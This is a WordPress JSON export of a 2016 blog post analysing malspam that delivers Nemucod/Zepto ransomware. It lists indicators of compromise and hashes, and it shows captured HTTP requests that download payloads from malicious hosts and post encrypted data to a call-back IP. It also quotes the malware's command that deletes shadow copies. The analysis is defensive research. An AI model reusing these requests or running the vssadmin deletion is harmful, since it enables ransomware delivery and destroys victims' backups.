{"id":580,"date":"2016-08-05T23:08:17","date_gmt":"2016-08-05T22:08:17","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=580"},"modified":"2016-08-05T23:08:17","modified_gmt":"2016-08-05T22:08:17","slug":"2016-08-05-malspam-leads-to-nemucodzepto-ransomeware","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=580","title":{"rendered":"2016-08-05 Malspam Leads To Nemucod\/Zepto Ransomeware"},"content":{"rendered":"<p>For this blog post I am covering what looks to be a new variant of Locky ransomware called &#8220;Zepto&#8221; which also uses Nemucod as it&#8217;s downloader. As of right now it looks like the main attack-vector from Zepto is from emails pretending to be something else (in this case a JPG in a zip archive) attached to an email as you can see below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Email.png\" alt=\"\" width=\"896\" height=\"492\" class=\"aligncenter size-full wp-image-581\" \/><\/a><\/p>\n<p>For some more information about this new variant of Locky please check out The Register&#8217;s article about it <a href=\"http:\/\/www.theregister.co.uk\/2016\/07\/04\/klepto_zepto_could_steal_millions_in_looming_ransomware_wave\/\" target=\"_blank\">here<\/a>. Also, the artifacts from this investigation along with the PCAP and Process Monitor logs can be found in my Github repo located <a href=\"http:\/\/github.com\/bloomer1016\/2016-08-05-Malspam-Zepto\" target=\"_blank\">here<\/a>.<\/p>\n<p>Indicators of Compromise:<br \/>\n=========================<br \/>\npeloteros1.50webs.com \/ 162.210.101.113 (Port 80)<br \/>\nheidechopper.de \/ 212.40.179.101 (Port 80)<br \/>\nwww.leonardopivi.it \/ 213.205.40.169 (Port 80)<br \/>\n185.129.148.19 (Port 80)<br \/>\nygpktpim.pw \/ 188.127.230.63 (Port 80)<br \/>\n31.41.46.29 (Port 80)<br \/>\nrrivgatfejqhg.pl (Unknown DNS)<br \/>\nuwqrqvttgfysrhu.org (Unknown DNS)<br \/>\ndcpxuedcnoa.click (Unknown DNS)<br \/>\ncljpimuk.xyz (Unknown DNS)<br \/>\najpwxtywqgv.ru (Unknown DNS)<br \/>\nfxveeemrorlfbuu.biz (Unknown DNS)<br \/>\nulelypjqsdo.click (Unknown DNS)<br \/>\npeirdhihpxsqhnt.info (Unknown DNS)<\/p>\n<p>Artifacts From Investigation:<br \/>\n=============================<br \/>\nFile name: 50977610310_95677.wsf<br \/>\nFile size: 31KB<br \/>\nMD5 hash: db13d1632fabb5e9a3495fb0f84b131d<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/da5f6249d20a28cea55ddd04dd1c9cd5a183b3ba4690a6b17daa4500fd93f089\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/da5f6249d20a28cea55ddd04dd1c9cd5a183b3ba4690a6b17daa4500fd93f089\/analysis\/<\/a><br \/>\nFirst Detection: 2016-08-05 11:55:06 UTC<br \/>\nDetection ratio: 3 \/ 55<\/p>\n<p>File name: ETNqJC<br \/>\nFile size: 260KB<br \/>\nMD5 hash: 4efca985895a53168d8ba990466d6cfb<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/faed997d40e60b92e2e8d798ad4fdd84a8fdbf13cd12e32886bda9c7bc38f655\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/faed997d40e60b92e2e8d798ad4fdd84a8fdbf13cd12e32886bda9c7bc38f655\/analysis\/<\/a><br \/>\nFirst Detection: 2016-08-05 10:56:04 UTC<br \/>\nDetection ratio: 2 \/ 52<\/p>\n<p>File name: ETNqJC.exe<br \/>\nFile size: 260KB<br \/>\nMD5 hash: 5525154d2928bded35303298b5da45e9<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/8feed91acb48f4f6d2ed01fdc2aa409c1e18700c089f4d92a28096fc4d40e3c7\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/8feed91acb48f4f6d2ed01fdc2aa409c1e18700c089f4d92a28096fc4d40e3c7\/analysis\/<\/a><br \/>\nFirst Detection: 2016-08-05 11:13:47 UTC<br \/>\nDetection ratio: 12 \/ 54<\/p>\n<p>File name: jtwlHmfWYP<br \/>\nFile size: 260KB<br \/>\nMD5 hash: 4efca985895a53168d8ba990466d6cfb<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/faed997d40e60b92e2e8d798ad4fdd84a8fdbf13cd12e32886bda9c7bc38f655\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/faed997d40e60b92e2e8d798ad4fdd84a8fdbf13cd12e32886bda9c7bc38f655\/analysis\/<\/a><br \/>\nFirst Detection: 2016-08-05 10:56:04 UTC<br \/>\nDetection ratio: 2 \/ 52<\/p>\n<p>File name: jtwlHmfWYP.exe<br \/>\nFile size: 260KB<br \/>\nMD5 hash: 5525154d2928bded35303298b5da45e9<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/8feed91acb48f4f6d2ed01fdc2aa409c1e18700c089f4d92a28096fc4d40e3c7\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/8feed91acb48f4f6d2ed01fdc2aa409c1e18700c089f4d92a28096fc4d40e3c7\/analysis\/<\/a><br \/>\nFirst Detection: 2016-08-05 11:13:47 UTC<br \/>\nDetection ratio: 12 \/ 54<\/p>\n<p>File name: xMgPNwjQRaB<br \/>\nFile size: 345KB<br \/>\nMD5 hash: 029ae44b379d08114259b850f45de150<br \/>\nVirustotal link: <a href=\"http:\/\/www.virustotal.com\/en\/file\/1a17a5e27c658004e3900653663f22969eaf852fa54d89488fbf3cfee29774d1\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/1a17a5e27c658004e3900653663f22969eaf852fa54d89488fbf3cfee29774d1\/analysis\/<\/a><br \/>\nFirst Detection: 2009-03-02 12:21:52 UTC<br \/>\nDetection ratio: 0 \/ 53<\/p>\n<p>File name: xMgPNwjQRaB.exe<br \/>\nFile size: 345KB<br \/>\nMD5 hash: d8386110658905838a51fff785fb4e09<\/p>\n<p>Traffic Analysis of Malware<br \/>\n===========================<br \/>\nOverall there is not much to this infection from a traffic perspective as it is pretty straight forward as you can see below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Wireshark.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Wireshark.png\" alt=\"\" width=\"2504\" height=\"504\" class=\"aligncenter size-full wp-image-585\" \/><\/a><\/p>\n<p>Once the malicious file has been executed on the system, there are three GET requests which correlates to the three binary files that get downloaded to the system. The first GET request fails since it returns a 404:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/8t76v45?bThyYkypV=LvxkcmwGoF HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: peloteros1.50webs.com\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 403 Forbidden\r\nContent-Type: text\/html\r\nContent-Length: 345\r\nDate: Fri, 05 Aug 2016 11:06:52 GMT\r\nServer: lighttpd\/1.4.28\r\n\r\n&lt;?xml version=&quot;1.0&quot; encoding=&quot;iso-8859-1&quot;?&gt;\r\n&lt;!DOCTYPE html PUBLIC &quot;-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN&quot;\r\n         &quot;http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd&quot;&gt;\r\n&lt;html xmlns=&quot;http:\/\/www.w3.org\/1999\/xhtml&quot; xml:lang=&quot;en&quot; lang=&quot;en&quot;&gt;\r\n &lt;head&gt;\r\n  &lt;title&gt;403 - Forbidden&lt;\/title&gt;\r\n &lt;\/head&gt;\r\n &lt;body&gt;\r\n  &lt;h1&gt;403 - Forbidden&lt;\/h1&gt;\r\n &lt;\/body&gt;\r\n&lt;\/html&gt;<\/pre>\n<p>Because this request fails to download the malicious binary, the file is just a copy of the 404 page. The next two GET requests look to be encrypted since you don&#8217;t see the usual magic number of &#8220;MZ&#8221; in the PCAP:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/8t76v45?RdlxnmQu=kHiQWaw HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: heidechopper.de\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 05 Aug 2016 13:56:25 GMT\r\nServer: Apache\r\nLast-Modified: Fri, 05 Aug 2016 11:00:41 GMT\r\nETag: &quot;c3c4133-40eb4-fa2d6840&quot;\r\nAccept-Ranges: bytes\r\nContent-Length: 265908\r\nKeep-Alive: timeout=3, max=25\r\nConnection: Keep-Alive\r\nContent-Type: text\/plain\r\n\r\n...jTo7Ej9pp..90.Yn8BPEW&quot;pvX0Qq5MJLjWo7En9ppU790OYn8BPEWbpvX8Pq5CU.dW.&gt;.O.q&lt;&#x5B;LONG STRING]\r\n\r\n-----\r\n\r\nGET \/8t76v45?bHkNox=KjdFgP HTTP\/1.1\r\nAccept: *\/*\r\nUA-CPU: AMD64\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/6.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: www.leonardopivi.it\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Fri, 05 Aug 2016 13:56:57 GMT\r\nServer: Apache\r\nLast-Modified: Fri, 05 Aug 2016 11:03:59 GMT\r\nETag: &quot;7d581c0-40eb4-539510606e3e9&quot;\r\nAccept-Ranges: bytes\r\nVary: Accept-Encoding\r\nContent-Encoding: gzip\r\nKeep-Alive: timeout=15, max=80\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text\/plain\r\n\r\n1faa\r\n............._S............N&quot;%&#x5B;LONG STRING] <\/pre>\n<p>From here we proceed to see the POST requests to the call-back domains. The interesting thing here is that while the infected system tries to POST what I am thinking are system details and other bits that are using a custom encryption method, the POST requests are all failing. Also, each POST to the call-back domains has the same data in it as far as I can tell. An example of this can be seen below:<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nPOST \/php\/upload.php HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Language: en-us\r\nReferer: http:\/\/185.129.148.19\/php\/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application\/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: 185.129.148.19\r\nContent-Length: 786\r\nConnection: Keep-Alive\r\n\r\nyzit=%F9%E4%D8H%C2%E7%8DE%85%AEp%F1%28%FA%28A%06q%ED%CDdr%9B%2C%9B%BA%0C%8Bg%5E%2F%B4r%AD%D3%BBj%EE_%81%3B%02%99c%AE%F9%AB%D2z&amp;cQqAK=%B6%18w%A4V%A5%9EXI%19%B9%8B%D4cg%EDM%BD%5D%93H&amp;hCoF=%D3l%2A%C6%7C%B80%B4%F6%9E%BDN%25%17V%2F%DC%1E%AE%7C%3F%2B_m%DC%F9%EE%0Ds%A9%86%22%7D%08%A9%2A%21%CC%0E%8C9%EA%1A%E1%8A%0A%FBRj&amp;TactdFW=%87%AAq%1A%F7%F8%98%C3%A2-%1AG%F1%7DVq%BBj%8D%A4%9C%C2LF%C6%C6%82%C7%80%5D%5D%F5.x%08&amp;FHGZZ=%C7%ECmj%AF%27k%98%B9%5D%F1%D8%3A%0E%23%C9%99DLvH6%5B%81%C4%EB%9DU%C8rW&amp;UkOIzI=npaQ%60%5B%F9%8DA%91%40%85%B9%5CP%E8%95%BF%FB%90%1F%7C%8C%3C%94h%BCc%28%DC%DB%F2%C0h&amp;vMdtw=%17O%95HEqy%7E%C8mfr%E3kQom%F0e%B3%B5%D6%C2%27q%5C%99+%BA%92u%BF%0E%96%A0%E6%2A%3E%EF&amp;qflL=9%28Ca%5BB%F6%F8%04p%D4%07%E3%1BD%CD%27%EE%F9d%A9%60H%CEo%94k%A2%7CC%96n%FE3%A9%DC%CC%AE%0F&amp;ouF=lVR%5C%05%E4%0DHTTP\/1.1 404 Not Found\r\nServer: nginx\r\nDate: Fri, 05 Aug 2016 13:57:44 GMT\r\nContent-Type: text\/html\r\nContent-Length: 162\r\nConnection: keep-alive\r\n\r\n&lt;html&gt;\r\n&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;\r\n&lt;body bgcolor=&quot;white&quot;&gt;\r\n&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;\r\n&lt;hr&gt;&lt;center&gt;nginx&lt;\/center&gt;\r\n&lt;\/body&gt;\r\n&lt;\/html&gt;<\/pre>\n<p>I am assuming that it is trying several times to make sure the data gets *SOMEWHERE*. Unfortunately it doesn&#8217;t look like it does. Also, we can see that there is a connection request to the IP address of 31.41.46.29 over port 80 that is never successful. Guess that these servers were already taken down by the time I ran this sample.<\/p>\n<p>Host Investigation<br \/>\n==================<br \/>\nLike Locky, the execution of this malware sample is pretty straight forward as seen below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/ProcMon.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/ProcMon.png\" alt=\"\" width=\"1280\" height=\"800\" class=\"aligncenter size-full wp-image-584\" \/><\/a><\/p>\n<p>When the script launches and performs the GET requests, it downloads the three malicious binaries from the different servers. The files that actually get downloaded are encrypted from what I can tell (based on what the file looks like when on the host and also in the PCAP), and then when on the compromised host system, gets decrypted and turned into actual executable binaries. All the files are located in the &#8220;C:\\Users\\%username%\\AppData\\Local\\Temp&#8221; path. <\/p>\n<p>From here we can see that the two binaries are then started with the script still the parent process. The main process that seems to do the bulk of the work and encrypting the file-system is the &#8220;ETNqJC.exe&#8221; process from what I gather. The other process is called &#8220;jtwlHmfWYP.exe&#8221; and at this time I am not exactly sure what this process is responsible for. I also noticed that one of the &#8220;ETNqJC.exe&#8221; child processes was responsible for the POST requests to the call back servers. We also see that the Windows Task Scheduler (taskeng.exe) process spins up, creates a new task, and then proceeds to run &#8220;C:\\windows\\system32\\vssadmin.exe Delete Shadows \/Quiet \/Al&#8221; command.<\/p>\n<p>Once the file system was encrypted, the communication to the call-back servers stopped and the usual pop-up alerts stating that the system had been encrypted became visible:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Help-Desktop.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Help-Desktop.png\" alt=\"\" width=\"1221\" height=\"776\" class=\"aligncenter size-full wp-image-583\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Help-Browser.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2016\/08\/Help-Browser.png\" alt=\"\" width=\"847\" height=\"536\" class=\"aligncenter size-full wp-image-582\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>For this blog post I am covering what looks to be a new variant of Locky ransomware called &#8220;Zepto&#8221; which also uses Nemucod as it&#8217;s downloader. As of right now it looks like the main attack-vector from Zepto is from emails pretending to be something else (in this case a JPG in a zip archive) attached to an email as you can see below: For some more information about this new variant of Locky please check out The Register&#8217;s article about it here. Also, the artifacts from this investigation along with the PCAP and Process Monitor logs can be found&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=580\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-580","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/580","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=580"}],"version-history":[{"count":2,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/580\/revisions"}],"predecessor-version":[{"id":587,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/580\/revisions\/587"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=580"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=580"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=580"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}